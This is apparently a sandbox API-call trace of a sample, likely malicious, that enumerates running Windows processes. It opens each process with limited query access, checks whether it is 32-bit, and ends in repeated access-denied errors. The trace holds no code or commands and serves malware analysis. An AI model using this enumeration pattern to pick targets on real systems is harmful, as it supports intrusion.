	[0074.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0074.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0074.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0074.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0074.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0074.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dcf0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0074.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0074.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0074.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0074.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0074.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0074.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0074.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0074.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0074.017] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.017] CloseHandle (hObject=0x224) returned 1
	[0074.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0074.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0074.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7288b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0074.018] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.018] CloseHandle (hObject=0x224) returned 1
	[0074.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728a98, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0074.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0074.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0074.018] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.018] CloseHandle (hObject=0x224) returned 1
	[0074.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0074.018] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.018] CloseHandle (hObject=0x224) returned 1
	[0074.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0074.019] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.019] CloseHandle (hObject=0x224) returned 1
	[0074.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0074.019] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.019] CloseHandle (hObject=0x224) returned 1
	[0074.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728958, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0074.019] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.019] CloseHandle (hObject=0x224) returned 1
	[0074.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0074.019] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.019] CloseHandle (hObject=0x224) returned 1
	[0074.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0074.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0074.020] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.020] CloseHandle (hObject=0x224) returned 1
	[0074.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0074.020] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.020] CloseHandle (hObject=0x224) returned 1
	[0074.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0074.020] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.020] CloseHandle (hObject=0x224) returned 1
	[0074.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728838, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0074.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0074.020] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.020] CloseHandle (hObject=0x224) returned 1
	[0074.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0074.021] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.021] CloseHandle (hObject=0x224) returned 1
	[0074.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0074.021] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.021] CloseHandle (hObject=0x224) returned 1
	[0074.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728978, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0074.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0074.021] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.021] CloseHandle (hObject=0x224) returned 1
	[0074.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea90, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0074.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0074.021] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.021] CloseHandle (hObject=0x224) returned 1
	[0074.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0074.021] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.021] CloseHandle (hObject=0x224) returned 1
	[0074.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0074.022] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.022] CloseHandle (hObject=0x224) returned 1
	[0074.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0074.022] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.022] CloseHandle (hObject=0x224) returned 1
	[0074.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728958, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0074.022] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.022] CloseHandle (hObject=0x224) returned 1
	[0074.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728998, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0074.022] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.022] CloseHandle (hObject=0x224) returned 1
	[0074.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0074.022] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.022] CloseHandle (hObject=0x224) returned 1
	[0074.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0074.023] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.023] CloseHandle (hObject=0x224) returned 1
	[0074.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e770, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0074.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0074.023] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.023] CloseHandle (hObject=0x224) returned 1
	[0074.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0074.023] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.023] CloseHandle (hObject=0x224) returned 1
	[0074.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772158, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0074.023] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.023] CloseHandle (hObject=0x224) returned 1
	[0074.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728a98, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0074.024] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.024] CloseHandle (hObject=0x224) returned 1
	[0074.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0074.024] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.024] CloseHandle (hObject=0x224) returned 1
	[0074.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7288b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0074.024] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.024] CloseHandle (hObject=0x224) returned 1
	[0074.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e8b0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0074.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0074.024] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.024] CloseHandle (hObject=0x224) returned 1
	[0074.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e7e8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0074.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.024] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.024] CloseHandle (hObject=0x224) returned 1
	[0074.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.025] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
